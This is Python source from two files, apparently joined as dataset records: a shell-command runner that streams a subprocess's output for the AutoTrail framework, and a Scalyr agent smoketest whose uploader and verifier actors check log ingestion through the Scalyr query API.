"""This method returns true if the run of the shell command was successful.
Success or Failure depends on two criteria:
1. If the exit code can be ignored (Default: exit code 0 is ignored.)
2. If no fatal error was encountered (Default: All errors are non-fatal)
This means that by default, if a shell command exits with an exit code of 0,
it is considered successful irrespective of the presence of any messages in STDERR.
Pre-condition:
self.is_exit_code_ignorable should refer to the predicate function.
Arguments:
command_process -- A Popen object that refers to the process running the shell command.
fatal_error -- This is either None or a string containing the last known fatal error.
Returns:
boolean -- True when the run was successful. False otherwise.
"""
exit_code = command_process.poll()
return (self.is_exit_code_ignorable(exit_code) and fatal_error is None)
def __call__(self, trail_env, context):
"""This method is the one called when AutoTrail runs this action function (an instance of this class).
It accepts TrailEnvironment and context for compliance and makes no use of context.
This method contains the business logic and makes use of all the other methods and helper functions to achieve
the following:
        1) Notify the user about starting.
2) Run the shell command in a subprocess.
3) Tail the STDOUT and STDERR and filter them as defined by the predicate functions and send them to the user.
4) Based on the predicate functions, determine if the run was successful or failed and notify the user of the
same.
        5) Notify AutoTrail about success or failure by either returning or raising ShellCommandFailedError.
Arguments:
trail_env -- An object of type TrailEnvironment. (passed by AutoTrail)
context -- A user defined object passed to AutoTrail during runtime. (passed by AutoTrail)
Returns:
String -- Message expressing success.
            Raises -- ShellCommandFailedError expressing failure.
"""
# Make a command using the provided command template and the values provided in the context (if any).
command = self.command_function(trail_env, context)
if command is None:
return 'No command to run.'
# This contains the last fatal error seen in STDERR. Will remain None if all errors encountered are non fatal.
# See class documentation to understand what fatal errors are.
latest_fatal_error = None
trail_env.output('[Command: {}] -- Starting.'.format(command))
command_process, stdin, stdout, stderr = run_shell_command(command)
# Start listeners, which will asynchronously collect any messages from STDOUT and STDERR and put them into
# queues.
stdout_listener, stdout_queue = create_stream_listener(stdout)
stderr_listener, stderr_queue = create_stream_listener(stderr)
        # Start the writer, which will asynchronously collect any messages from the user and write them into STDIN.
# All messages sent by the user are available in trail_env.input_queue.
stdin_writer = create_stream_writer(trail_env.input_queue, stdin)
# Tail the command and asynchronously collect messages in STDOUT and STDERR
for stdout_messages, stderr_messages in tail_command(command_process, stdout_queue, stderr_queue,
delay=self.delay):
# Filter the messages based on user-provided predicate functions.
valid_stdout_messages = self.get_valid_stdout_messages(stdout_messages)
valid_stderr_messages = self.get_valid_stderr_messages(stderr_messages)
# Notify user.
self.send_messages(trail_env, 'STDOUT', valid_stdout_messages)
self.send_messages(trail_env, 'STDERR', valid_stderr_messages)
latest_fatal_error = self.get_latest_fatal_error(valid_stderr_messages)
# Terminate the listeners and writers because they don't have any termination logic in them and need to be
# terminated explicitly.
stdout_listener.terminate()
stderr_listener.terminate()
stdin_writer.terminate()
if self.was_run_successful(command_process, latest_fatal_error):
message = self.generate_success_message(command, command_process)
trail_env.output(message)
return message
else:
message = self.generate_failure_message(command, command_process, latest_fatal_error)
trail_env.output(message)
raise ShellCommandFailedError(message)
def make_simple_templating_function(template):
"""Factory for making a templating function that applies the context object to the given template to create a
string.
Arguments:
template -- Templated string, whose values will be filled at run-time from the passed context.
For example, the templated string:
'ls -l {filename}'
Will result in a string where the {filename} value will be populated by using "context.filename"
attribute of context.
If no context is passed, templating will have no effect.
If no templating is done, context values will have no effect.
Returns:
        A templating function that accepts TrailEnvironment and context objects, returning a string.
Usage:
make_simple_templating_function('ls -l {filename}')
Will return a function that accepts TrailEnvironment and context. When called, it will return the string:
'ls -l <filename obtained using getattr(context, "filename")>'
"""
return lambda trail_env, context: apply_object_attributes_to_template(template, context)
def make_context_attribute_based_templating_function(attribute_name, template, expected_value=True, notify_user=True):
"""Factory for making a conditional templating function that:
1. Obtains the attribute_name from the context object by calling getattr(<context>, attribute_name).
2. Compares this value with the expected_value.
3. If the values match, apply the context object to the template and return the string.
4. If the values do not match, do nothing, return None. (Sends a message to the user using TrailEnvironment.output
if notify_user is True)
Arguments:
attribute_name -- string - The attribute's name in the context object, whose value will be used to decide
                               whether an instruction will be sent to the user or not.
expected_value -- Any comparable object. This value will be compared with the value obtained from context.
Defaults to True.
template -- Templated string, whose values will be filled at run-time from the passed context.
Example:
'ls -l {filename}'
The {filename} value will be populated by using "context.filename" attribute of context.
If no context is passed, templating will have no effect.
If no templating is done, context values will have no effect.
Returns:
        A templating function that accepts TrailEnvironment and context objects, returning a string.
Usage:
make_context_attribute_based_templating_function('list_file', 'ls -l {filename}')
Will return a function that accepts TrailEnvironment and context. When called, it will:
1. Extract the 'list_file' attribute from the context.
2. If this value == True, it will return the string:
'ls -l <filename obtained using getattr(context, "filename")>'
Otherwise, it will return None. (And notify the user using TrailEnvironment.output)
"""
def templating_function(trail_env, context):
attribute_value = getattr(context, attribute_name)
if attribute_value == expected_value:
return apply_object_attributes_to_template(template, context)
elif notify_user:
trail_env.output(('Nothing to do since "{attribute_name}" in context has the value: "{value}" and the '
'expected value is: "{expected_value}".').format(
attribute_name=attribute_name, value=attribute_value, expected_value=expected_value))
return templating_function
def apply_object_attributes_to_template(template, value_object):
"""Generate a string from the template by applying values from the given object.
    If the template provided is not a template (does not have any placeholders), this will not have any effect and the template
will be returned unchanged.
If value_object is None, this will not have any effect.
Arguments:
template -- A string that may or may not be templated.
If templated, the placeholders will be populated with values from the attributes of the
value_object.
    value_object -- Any object that supports the __dict__ method. Most classes have a __dict__ method that returns a
mapping of all the attributes and the associated values.
Returns:
string -- This will be the template, with the values from value_object applied.
"""
# Parse the template and extract the field names.
# We'll use the field names to explicitly look-up attributes in the value_object.
# The reason for this is that it works for @property attributes as well as normal attributes.
field_names = [field_name for _, field_name, _, _ in string.Formatter().parse(template) if field_name is not None]
template_values = {}
for field_name in field_names:
try:
template_values[field_name] = getattr(value_object, field_name)
except AttributeError as e:
raise AttributeError(('Unable to apply object to template. Could not look-up attribute \'{}\' in the '
'object \'{}\'. Error: {}').format(field_name, str(value_object), str(e)))
return template.format(**template_values)
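# Illustrative example (the Context class below is hypothetical, not part of this module):
#
#   class Context(object):
#       filename = 'report.txt'
#
#   apply_object_attributes_to_template('ls -l {filename}', Context())
#   # -> 'ls -l report.txt'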
def stream_reader(stream, queue):
"""This is a worker that is used by ShellCommand to tail STDOUT and STDERR of a running command.
This worker doesn't have any termination logic and needs to be terminated by the caller.
Arguments:
stream -- A stream to read from. Like subprocess.PIPE. Must support readline() method.
queue -- A multiprocessing.Queue object into which this function will be writing messages from the stream to.
"""
while True:
line = stream.readline().strip()
if line:
queue.put(line)
def stream_writer(queue, stream):
"""This is a worker that constantly reads from the given queue and writes to the given stream the moment any
    messages arrive. This is used by ShellCommand to tail an input queue and write the arriving messages to STDIN.
This worker doesn't have any termination logic and needs to be terminated by the caller.
Arguments:
queue -- A multiprocessing.Queue object from which this function will be reading messages and writing into the
stream.
stream -- A stream to write to. Like subprocess.PIPE. Must support write() method.
"""
while True:
message = queue.get()
stream.write(message)
def create_stream_writer(queue, stream):
"""Runs a writer to tail a queue and write to a stream.
When the shell command is run with Popen, we need a way to asynchronously and non-blockingly receive messages sent
by the user and write to the STDIN of the running process. This is achieved by running the stream_writer function
as a subprocess. Each such instance is called a writer.
The writer reads from the given queue and as soon as it gets a message, it writes it to the given stream.
Typically this is used to read from a multiprocessing.Queue like object and write to a stream like STDIN.
This function creates and runs one instance of a writer.
Arguments:
queue -- A multiprocessing.Queue object from which the writer will be reading messages and writing into the stream.
stream -- A stream to write to. Like subprocess.PIPE. Must support write() method.
Returns:
writer_process -- A multiprocessing.Process object referring to the writer subprocess. This is needed to terminate
the writer since the writer worker contains no termination logic.
"""
writer_process = Process(target=stream_writer, args=(queue, stream))
writer_process.start()
return writer_process
def create_stream_listener(stream):
"""Runs listeners to tail STDOUT and STDERR.
When the shell command is run with Popen, we need a way to asynchronously and non-blockingly read STDOUT and STDERR.
This is achieved by running the stream_reader function as a subprocess.
Each such instance is called a listener. This function creates and runs such listeners:
Arguments:
stream -- A stream to read from. Like subprocess.PIPE. Must support readline() method.
Returns:
A tuple of the form: (listener_process, queue)
Where:
listener_process -- A multiprocessing.Process object referring to the listener subprocess. This is needed to
terminate the listener since the listener contains no termination logic.
queue -- A multiprocessing.Queue object into which the listener will be writing messages from the stream
to. This conversion from a stream like object to a queue like object allows one to read in a
non-blocking manner.
"""
queue = ProcessQueue()
listener_process = Process(target=stream_reader, args=(stream, queue))
listener_process.start()
return (listener_process, queue)
def run_shell_command(shell_command):
"""Run the shell command associated with this class.
Uses Popen to run the command in a separate process.
Arguments:
shell_command -- A string containing the shell command.
Returns:
A tuple of the form: (command_process, stdin, stdout, stderr) Where:
command_process -- A subprocess.Popen object referring to the subprocess that is running the shell command.
stdin -- A subprocess.PIPE object into which the STDIN messages can be written.
stdout -- A subprocess.PIPE object into which the STDOUT is being redirected.
stderr -- A subprocess.PIPE object into which the STDERR is being redirected.
"""
command_as_list = shlex.split(shell_command)
# Run the command as a subprocess
command_process = Popen(command_as_list, stdin=PIPE, stdout=PIPE, stderr=PIPE)
stdin = command_process.stdin
stdout = command_process.stdout
stderr = command_process.stderr
return (command_process, stdin, stdout, stderr)
def tail_command(command_process, stdout_queue, stderr_queue, delay=1):
"""Tail a running command and collect messages from STDOUT and STDERR queues and yield the collected messages with
each iteration.
Arguments:
command_process -- A subprocess.Popen object referring to the subprocess that is running the shell command.
stdout_queue -- A multiprocessing.Queue object into which an STDOUT listener would be writing messages.
stderr_queue -- A multiprocessing.Queue object into which an STDERR listener would be writing messages.
Keyword Arguments:
delay -- The delay in seconds between collecting messages from the STDOUT and STDERR queues.
Returns:
A generator that yields tuples of the form: (stdout_messages, stderr_messages) Where:
stdout_messages -- A list of messages collected from STDOUT stream.
stderr_messages -- A list of messages collected from STDERR stream.
"""
while command_process.poll() is None:
# Sleep has to go at the beginning of the loop because the subsequent statements outside of the loop assume
        # that the process has finished and all STDOUT and STDERR messages have been collected. If sleep is at the end
# of the loop and the process sends some messages to STDOUT or STDERR and exits within this delay, the next
# iteration of the loop will not execute and the messages will be lost.
sleep(delay)
stdout_messages = get_messages_from_queue(stdout_queue)
stderr_messages = get_messages_from_queue(stderr_queue)
yield (stdout_messages, stderr_messages)
def get_messages_from_queue(queue):
"""Read messages from the given queue until it is empty.
Arguments:
queue -- A multiprocessing.Queue like object that supports get_nowait() method and raises Queue.Empty exception
when there are no more messages to be read.
Returns:
list -- A list of messages read from the queue.
"""
messages = []
while True:
try:
messages.append(queue.get_nowait())
except QueueEmpty:
break
return messages
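# Minimal sketch tying the helpers above together outside of ShellCommand
# (ShellCommand.__call__ is the canonical user of these; the command shown is illustrative):
#
#   process, stdin, stdout, stderr = run_shell_command('ls -l')
#   stdout_listener, stdout_queue = create_stream_listener(stdout)
#   stderr_listener, stderr_queue = create_stream_listener(stderr)
#   for stdout_messages, stderr_messages in tail_command(process, stdout_queue, stderr_queue, delay=1):
#       for line in stdout_messages:
#           print(line)
#   stdout_listener.terminate()
#   stderr_listener.terminate()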
|
smoketest.py
|
"""
Agent smoketest code.
This python script is meant to be invoked within a docker image in which the proper python version is activated (e.g.
via pyenv). In this way, the agent can be validated against different python versions.
Concept:
This code serves as a common code-base for different types of smoketest "processes" (i.e. same code runs in
different modes). Examples of modes are (uploader, verifier).
Uploader (a.k.a Producer):
Waits for Scalyr agent to be up and running (by querying scalyr backend).
Produces 1000 lines of dummy data very quickly, then produces one additional line of data every second.
If the agent is working correctly, this data will be correctly ingested and uploaded to Scalyr (by the agent)
and can subsequently be verified (by the Verifier).
Verifier:
Waits for Scalyr agent to be up and running.
Keeps polling until max_wait for the expected uploader data.
Usage:
smoketest.py ${process_name} ${max_wait} \
--mode verifier \
--scalyr_server ${SCALYR_SERVER} \
--read_api_key ${READ_API_KEY} \
--agent_hostname ${agent_hostname} \
--uploader_hostname ${uploader_hostname} \
--debug true"
where:
process_name: A means by which the invoker script can inform this script what the current process name is.
The process_name is important as it is parsed/modified to construct verifying queries.
E.g. process_name is used to construct a logfile to be queried such as "/docker/<process_name>-uploader.log".
Moreover, any given CI build should not conflict with other builds and therefore should have a unique
process name (e.g. /docker/ci-agent-docker-json-5986-uploader.log where "ci-agent-docker-json-5986" is a unique
identifier specific to a CI build.
Additionally, the process name determines which class to instantiate (see
CONTAINER_PREFIX_2_VERIFIER_CLASS). The invoker can choose different implementations (e.g. for LogStash)
by using one of the prefixes defined in CONTAINER_PREFIX_2_VERIFIER_CLASS. An object of that class is then
instantiated and begins running in the specified mode (either as an Uploader or Verifier).
max_wait: Maximum time to run until exiting with failure.
mode: Operational mode which determines what this process does. Must be one of (uploader, verifier, agent).
scalyr_server: Scalyr backend server to connect to (typically qatesting.scalyr.com when testing)
monitored_logfile: Absolute path of the data file to write which the agent then ingests. Logstash producers also
write to this file, which is then configured as an input to the Logstash aggregator.
python_version: Python version that the agent is running on (becomes part of the Uploader data)
read_api_key: Read API key to use when querying the Scalyr backend to verify expected data has been uploaded.
agent_hostname: Uploaders and Verifiers need to know the agent_hostname of the agent process in order to construct
a proper verifying query (because they query for a log line uploaded by the agent in order to know when it has
successfully started). This agent_hostname is typically passed in by the invoker script that starts the Uploader
or Verifier.
uploader_hostname: Similar to agent_hostname, Verifiers need to wait for Uploaders to finish uploading before
performing their verifying queries. The uploader_hostname is a necessary piece of information typically passed
in by the invoker script that starts the Uploader and Verifier.
debug: true|false . If true, prints out all Scalyr api queries (useful for debugging)
Note:
This test code requires Python 3 with specific packages installed (i.e. requests).
"""
__author__ = "echee@scalyr.com"
import argparse
import os
import json
import time
import requests
import socket
import sys
import threading
import urllib
from copy import deepcopy
NAME_SUFFIX_UPLOADER = "uploader"
NAME_SUFFIX_VERIFIER = "verifier"
# no actual Actor will run as this name, but the constant is needed for logic that checks on the Agent container
NAME_SUFFIX_AGENT = "agent"
NAME_SUFFIXES = [NAME_SUFFIX_UPLOADER, NAME_SUFFIX_VERIFIER, NAME_SUFFIX_AGENT]
def _pretty_print(header="", message="", file=sys.stdout):
if header:
print("", file=file)
print("=" * 79, file=file)
print(header, file=file)
print("=" * 79, file=file)
if len(message) > 0: # message can be spaces
print(message, file=file)
def _exit(code, show_agent_status=True, header="", message=""):
"""Prints agent status before exiting"""
file = sys.stdout if code == 0 else sys.stderr
if show_agent_status:
_pretty_print(header="BEGIN AGENT STATUS")
# TODO fix this to work under python 3
print("TODO: Scalyr agent status does not work under python 3 yet")
# agent_exec = '/usr/share/scalyr-agent-2/bin/scalyr-agent-2'
# if os.path.isfile(agent_exec):
# os.system('{} status -v'.format(agent_exec))
_pretty_print(header="END AGENT STATUS")
_pretty_print(message=" ")
_pretty_print(header, message, file=file)
# exit even if other threads are running
os._exit(code)
class SmokeTestActor(object):
"""
Abstract base class for all verifiers.
Some objects may only upload.
Others may only verify.
Some may do both, in which case we may need a barrier
"""
DEFAULT_POLL_INTERVAL_SEC = 10
def __init__(self, **kwargs):
self._process_name = kwargs.get("process_name")
self._scalyr_server = kwargs.get("scalyr_server")
self._read_api_key = kwargs.get("read_api_key")
self._max_wait = float(kwargs.get("max_wait"))
self._localhostname = socket.gethostname()
self._barrier = None
self._barrier_lock = threading.Lock()
self._lines_to_upload = 1000
self.__init_time = time.time()
self._agent_started_lock = threading.Lock()
self._agent_started = False
self._debug = (kwargs.get("debug") or "").lower() in (
"true",
"y",
"yes",
"t",
"1",
)
def _get_uploader_output_streams(self):
"""Returns list of streams to write log data"""
raise NotImplementedError
def _get_uploader_stream_names(self):
"""Returns list of streams to write log data"""
raise NotImplementedError
def _get_stream_name_from_stream(self, stream):
return stream.name[1:-1]
def get_hard_kill_time(self):
"""Returns time in epoch seconds for when this process must terminate"""
return self.__init_time + self._max_wait
def verifier_type(self):
raise NotImplementedError
def is_verifier(self):
raise NotImplementedError
def is_uploader(self):
raise NotImplementedError
def _get_barrier(self, parties=2):
"""Lazy-instantiate a barrier"""
with self._barrier_lock:
if not self._barrier:
self._barrier = threading.Barrier(parties, timeout=self._max_wait)
return self._barrier
def __wait_at_barrier(self):
"""
For coordinating processes.
Currently only used to prevent uploader OR verifier from proceeding until agent is verified up and running.
Note: uploader and verifier do not block each other, regardless of whether they
run within same process or in different processes.
"""
barrier = self._get_barrier()
if barrier:
print("... Blocking at barrier")
barrier.wait()
print("... Unblocked")
def exit(self, code, **kwargs):
_exit(code, **kwargs)
def verify_logs_uploaded(self):
"""Query scalyr to verify presence of uploaded data"""
raise NotImplementedError
def verify_agent_started_or_die(self):
"""Verify state or processes that should be present or running if agent is running"""
raise NotImplementedError
def wait_for_agent_to_start(self):
"""Both upload or verification should not begin until agent is confirmed started"""
with self._agent_started_lock:
if not self._agent_started:
self.verify_agent_started_or_die()
self._agent_started = True
def verify_or_die(self):
"""
Query the Scalyr backend in search for what we know we uploaded.
Error out after a certain time limit.
Returns:
Nothing. Exits with status 0 or 1
"""
self.wait_for_agent_to_start()
self.verify_logs_uploaded()
def _make_log_line(self, count, stream):
"""Return a line of text to be written to the log. Don't include trailing newline
Args:
count: line number (concrete class may choose to incorporate into line content for verification)
stream: output stream (concrete class may choose to incorporate into line content for verification)
"""
raise NotImplementedError
def trigger_log_upload(self):
self.wait_for_agent_to_start()
streams = self._get_uploader_output_streams()
count = 0
while time.time() < self.get_hard_kill_time():
for stream in streams:
stream.write(self._make_log_line(count, stream))
stream.write("\n")
stream.flush()
if count >= self._lines_to_upload:
time.sleep(1) # slow down if threshold is reached
# Write to all streams for a given count
count += 1
def _make_query_url(
self,
filter_dict=None,
message="",
override_serverHost=None,
override_log=None,
override_log_regex=None,
):
"""
Make url for querying Scalyr server. Any str filter values will be url-encoded
"""
base_params = self._get_base_query_params()
url = "https://" if not self._scalyr_server.startswith("http") else ""
url += "{}/api/query?queryType=log&{}".format(
self._scalyr_server, urllib.parse.urlencode(base_params)
)
# Set serverHost/logfile from object state if not overridden
if not filter_dict:
filter_dict = {}
filter_dict["$serverHost"] = override_serverHost or self._process_name
# only if no log regex is provided do we then add an exact logfile match
if not override_log_regex:
filter_dict["$logfile"] = (
override_log or self._logfile # pylint: disable=no-member
)
filter_frags = []
for k, v in filter_dict.items():
if type(v) == str:
v = '"{}"'.format(urllib.parse.quote_plus(v))
filter_frags.append("{}=={}".format(k, v))
# If log regex is provided, add a regex matches clause
if override_log_regex:
filter_frags.append(
'{} matches "{}"'.format("$logfile", override_log_regex)
)
# Add message
if message:
filter_frags.append(
"$message{}".format(
urllib.parse.quote_plus(' contains "{}"'.format(message))
)
)
url += "&filter={}".format("+and+".join(filter_frags))
if self._debug:
print("\nURL quoted = {}".format(url))
print(" unquoted = {}".format(urllib.parse.unquote_plus(url)))
return url
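# Illustrative example (hedged, not taken from a real query): with
# override_serverHost="agent-host", override_log="/docker/ci-uploader.log" and
# message='count=1000', the filter portion of the URL comes out roughly as
#   &filter=$serverHost=="agent-host"+and+$logfile=="%2Fdocker%2Fci-uploader.log"+and+$message+contains+%22count%3D1000%22
# i.e. string values are url-encoded with urllib.parse.quote_plus and the fragments
# are joined with "+and+".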
def _get_base_query_params(self):
"""Get base query params (not including filter)"""
params = {
"maxCount": 1,
"startTime": "10m",
"token": self._read_api_key,
}
return params
def poll_until_max_wait(
self,
verify_func,
description,
success_mesg,
fail_mesg,
exit_on_success=False,
exit_on_fail=False,
poll_interval=None,
):
"""
Template design pattern method for polling until a maximum time. Each poll executes the provided verify_func().
fail/success messages are parameterized, as well as whether to exit.
Args:
verify_func: Function to execute for each check. Must return True/False
description: Text to print at beginning of check
success_mesg: Text to print on success
fail_mesg: Text to print on failure
exit_on_success: If success, exit (with code 0)
exit_on_fail: If fail, exit (with code 1)
"""
_pretty_print(description)
verified = False
prev = time.time()
while time.time() < self.get_hard_kill_time():
# Try to verify upload by querying Scalyr server
sys.stdout.write(". ")
sys.stdout.flush()
verified = verify_func()
# query backend to confirm.
if verified:
success_mesg = "\nSUCCESS !!. " + success_mesg
if exit_on_success:
self.exit(0, message=success_mesg)
else:
_pretty_print(message=success_mesg, file=sys.stdout)
break
# Sleep a bit before trying again
time.sleep(poll_interval or SmokeTestActor.DEFAULT_POLL_INTERVAL_SEC)
cur = time.time()
if cur - prev > 10:
print(
"{} seconds remaining".format(int(self.get_hard_kill_time() - cur))
)
prev = cur
else:
fail_mesg = "FAILED. Time limit reached. " + fail_mesg
if exit_on_fail:
self.exit(1, message=fail_mesg)
else:
_pretty_print(message=fail_mesg, file=sys.stderr)
class StandaloneSmokeTestActor(SmokeTestActor):
"""
Standalone agent verifier.
A single process performs both Uploader and Verifier tasks.
Therefore, the logfile that we Upload to is the same file that is verified (filename queried for verification).
Waits for same-host Agent to be up and running (by watching for local agent.pid/log files).
Then writes to a Json file which is picked up by Agent.
Finally, queries Scalyr backend to confirm Json file was uploaded.
"""
VERIFIER_TYPE = "Standalone"
def __init__(self, **kwargs):
super().__init__(**kwargs)
self._logfile = kwargs.get("monitored_logfile")
self._python_version = kwargs.get("python_version")
def is_verifier(self):
return True
def is_uploader(self):
return True
def _get_uploader_output_streams(self):
"""Returns stream to write log data into"""
return [open(self._logfile, "w+")]
def _get_uploader_stream_names(self):
"""Returns stream to read log data from"""
return [self._logfile]
def _make_log_line(self, count, stream):
"""Return a line of JSON for data.json (which is uploaded by the Agent)"""
obj = {
"verifier_type": self.VERIFIER_TYPE,
"count": count,
"hostname": self._localhostname,
"python_version": "python{}".format(self._python_version),
"line_stream": stream.name,
}
return json.dumps(obj)
def verify_agent_started_or_die(self):
"""Poll for agent pid and log file"""
def _check_agent_pid_and_log_files():
# If agent is not started, print agent.log if it exists
agent_logfile = "/var/log/scalyr-agent-2/agent.log"
agent_pid_file = "/var/log/scalyr-agent-2/agent.pid"
if not os.path.isfile(agent_pid_file) or not os.path.isfile(agent_logfile):
return False
return True
self.poll_until_max_wait(
_check_agent_pid_and_log_files,
"Checking for agent pid and log files",
"Agent is running.",
"No agent running.",
poll_interval=1,
)
def verify_logs_uploaded(self):
"""
For standalone agent, confirmation of log upload hinges on a successful poll
of a single matching row as follows:
python_version matches the standalone agent python version
hostname matches the docker container hostname running the standalone agent
"""
def _query_scalyr_for_monitored_log_upload():
# TODO: This should be self._lines_to_upload (i.e. 1000, but it doesn't work
# for logstash where for some reason only 300-600 lines are uploaded most
# of the time. Once that bug is fixed, change this back to self._lines_to_upload
expected_count = 1000
resp = requests.get(
self._make_query_url(
{
"$verifier_type": self.VERIFIER_TYPE,
"$python_version": "python{}".format(self._python_version),
"$hostname": self._localhostname,
"$count": expected_count,
}
)
)
if resp.ok:
data = json.loads(resp.content)
if "matches" not in data:
return False
matches = data["matches"]
if len(matches) == 0:
return False
att = matches[0]["attributes"]
verifier_type = att["verifier_type"]
python_version = att["python_version"]
hostname = att["hostname"]
cnt = att["count"]
if all(
[
verifier_type == self.VERIFIER_TYPE,
python_version == "python{}".format(self._python_version),
hostname == self._localhostname,
cnt == expected_count,
]
):
return True
return False
self.poll_until_max_wait(
_query_scalyr_for_monitored_log_upload,
"Querying server to verify monitored logfile was uploaded.",
"Monitored logfile upload verified",
"Monitored logfile upload not verified",
exit_on_success=True,
exit_on_fail=True,
)
class DockerSmokeTestActor(SmokeTestActor):
"""
Base Docker actor.
Some containers will write logs to Scalyr but only one container will verify.
(The current setup has only one uploader + one verifier)
Because there are multiple processes (containers) running, it is necessary to synchronize them for the Smoketest
to correctly work.
Upload / Verify will not begin until the remote agent is confirmed to be up and running. This is done by querying
Scalyr.
For clarity/maintainability of the Upload/Verifier code, an actor should only upload or verify, not both. (This is
different from the Standalone actor where a single process runs both upload and verify and checks the local agent
via file system).
"""
def __init__(self, **kwargs):
"""
:param max_wait: Max seconds before exiting
:param mode: Operational mode; one of 'uploader', 'verifier' or 'agent' (see NAME_SUFFIXES)
"""
super().__init__(**kwargs)
self.mode = kwargs.get("mode")
self._logfile = "/docker/{}.log".format(self._process_name)
self._agent_hostname = kwargs.get("agent_hostname")
self._uploader_hostname = kwargs.get("uploader_hostname")
_pretty_print('Agent hostname="{}"'.format(self._agent_hostname))
_pretty_print('Uploader hostname="{}"'.format(self._uploader_hostname))
def is_verifier(self):
return self.mode == NAME_SUFFIX_VERIFIER
def is_uploader(self):
return self.mode == NAME_SUFFIX_UPLOADER
def _serialize_row(self, obj):
"""Write a single row of key=value, separated by commas. Standardize by sorting keys"""
keyvals = [(key, obj.get(key)) for key in sorted(obj.keys())]
return ",".join(["{}={}".format(k, v) for k, v in keyvals])
def _make_log_line(self, count, stream):
return self._serialize_row(
{
"verifier_type": self.VERIFIER_TYPE, # pylint: disable=no-member
"count": count,
"line_stream": self._get_stream_name_from_stream(stream),
# No need for hostname in the log line. The agent_container_id & remote-container-logfile name uniquely identify the
# correct log.
# "hostname": self._localhostname,
}
)
def _get_process_name_for_suffix(self, suffix):
assert suffix in [
NAME_SUFFIX_AGENT,
NAME_SUFFIX_UPLOADER,
NAME_SUFFIX_VERIFIER,
]
parts = self._process_name.split("-")[:-1]
parts.append(suffix)
return "-".join(parts)
def _get_stream_name_from_stream(self, stream):
return stream.name[1:-1]
def _get_uploader_output_streams(self):
return [sys.stderr, sys.stdout]
def _get_uploader_stream_names(self):
"""Docker and k8s subclasses all verify by querying stream names of 'stderr' and 'stdout'"""
return [stream.name[1:-1] for stream in [sys.stderr, sys.stdout]]
def verify_agent_started_or_die(self):
"""
Docker agent is not running in same container as Verifier.
Verifier must query Scalyr to determine presence of these 2 files:
serverHost=<agent_short_container_id>, logfile=/var/log/scalyr-agent-2/agent.log
serverHost=<agent_short_container_id>, logfile=/var/log/scalyr-agent-2/docker_monitor.log
filter="Starting monitor docker_monitor()"
"""
def _query_scalyr_for_agent_logfile(logfile):
def _func():
resp = requests.get(
self._make_query_url(
override_serverHost=self._agent_hostname, override_log=logfile,
)
)
if resp.ok:
data = json.loads(resp.content)
if "matches" not in data:
return False
matches = data["matches"]
if len(matches) == 0:
return False
return True
return False
return _func
for filename in self._get_expected_agent_logfiles():
self.poll_until_max_wait(
_query_scalyr_for_agent_logfile(filename),
"Check if Agent is running: query scalyr for agent container file: {}".format(
filename
),
"{} found".format(filename),
"Time limit reached. Could not verify liveness of Agent Docker Container.",
exit_on_success=False,
exit_on_fail=True,
)
def _get_expected_agent_logfiles(self):
return [
"/var/log/scalyr-agent-2/agent.log",
"/var/log/scalyr-agent-2/docker_monitor.log",
]
def _get_uploader_override_logfilename_regex(self, process_name):
"""All logfile filters are exact and therefore we return None in the general case"""
return None
def _get_mapped_logfile_prefix(self):
raise NotImplementedError
def _get_extra_query_attributes(self, stream_name, process_name):
"""Dictionary of query field key-vals (besides serverHost, logfile, filters)"""
raise NotImplementedError
def _verify_queried_attributes(self, att, stream_name, process_name):
if att.get("containerName") != process_name:
return False
return True
def verify_logs_uploaded(self):
"""
For docker agent, confirmation requires verification that all uploaders were able to upload.
There are 2 separate types of containers.
1. uploader: uploads data to Scalyr (can easily support multiple but for now, just 1)
2. verifier: verifies data was uploaded by uploader
"""
def _query_scalyr_for_upload_activity(contname_suffix, stream_name):
def _func():
process_name = self._get_process_name_for_suffix(contname_suffix)
resp = requests.get(
self._make_query_url(
self._get_extra_query_attributes(stream_name, process_name),
override_serverHost=self._agent_hostname,
override_log="{}/{}.log".format(
self._get_mapped_logfile_prefix(), process_name
),
override_log_regex=self._get_uploader_override_logfilename_regex(
process_name
),
message=self._serialize_row(
{
"verifier_type": self.VERIFIER_TYPE, # pylint: disable=no-member
"count": self._lines_to_upload,
"line_stream": stream_name,
}
),
)
)
if resp.ok:
data = json.loads(resp.content)
if "matches" not in data:
return False
matches = data["matches"]
if len(matches) == 0:
return False
att = matches[0]["attributes"]
return self._verify_queried_attributes(
att, stream_name, process_name
)
return False # Non-ok response
return _func
suffixes_to_check = [NAME_SUFFIX_UPLOADER]
for count, suffix in enumerate(suffixes_to_check):
for stream_name in self._get_uploader_stream_names():
self.poll_until_max_wait(
_query_scalyr_for_upload_activity(suffix, stream_name),
"Querying server to verify upload: container[stream]='{}[{}].".format(
self._get_process_name_for_suffix(suffix), stream_name
),
"Upload verified for {}[{}].".format(suffix, stream_name),
"Upload not verified for {}[{}].".format(suffix, stream_name),
exit_on_success=count == len(suffixes_to_check),
exit_on_fail=True,
)
class DockerJsonActor(DockerSmokeTestActor):
"""These subclasses capture differences between JSON and Syslog implementations"""
VERIFIER_TYPE = "Docker JSON"
def _get_mapped_logfile_prefix(self):
return "/docker"
def _get_extra_query_attributes(self, stream_name, process_name):
return {"$stream": stream_name}
def _verify_queried_attributes(self, att, stream_name, process_name):
if not super()._verify_queried_attributes(att, stream_name, process_name):
return False
if not all(
[att.get("stream") in stream_name, att.get("monitor") == "agentDocker"]
):
return False
return True
class DockerSyslogActor(DockerSmokeTestActor):
VERIFIER_TYPE = "Docker Syslog"
def _get_extra_query_attributes(self, stream_name, process_name):
return {}
def _get_mapped_logfile_prefix(self):
return "/var/log/scalyr-agent-2/containers"
def _verify_queried_attributes(self, att, stream_name, process_name):
if not super()._verify_queried_attributes(att, stream_name, process_name):
return False
if not all(
[
att.get("monitor") == "agentSyslog",
att.get("parser") == "agentSyslogDocker",
]
):
return False
return True
class K8sActor(DockerSmokeTestActor):
"""
Uploaders write to std output/error
Verifiers query for 'stdout', 'stderr'
"""
VERIFIER_TYPE = "Kubernetes"
def _get_expected_agent_logfiles(self):
return [
"/var/log/scalyr-agent-2/agent.log",
"/var/log/scalyr-agent-2/kubernetes_monitor.log",
]
def _get_mapped_logfile_prefix(self):
return "/docker"
def _get_extra_query_attributes(self, stream_name, process_name):
return {"$stream": stream_name}
def _verify_queried_attributes(self, att, stream_name, process_name):
"""
Here's example JSON response for k8s
"matches": [
{
"severity": 3,
"session": "log_session_5645060384390470634",
"attributes": {
"pod_namespace": "default",
"scalyr-category": "log",
"stream": "stderr",
"pod_uid": "f2d1d738-9a0c-11e9-9b04-080027029126",
"pod-template-hash": "76bcb9cf9",
"run": "ci-agent-k8s-7777-uploader",
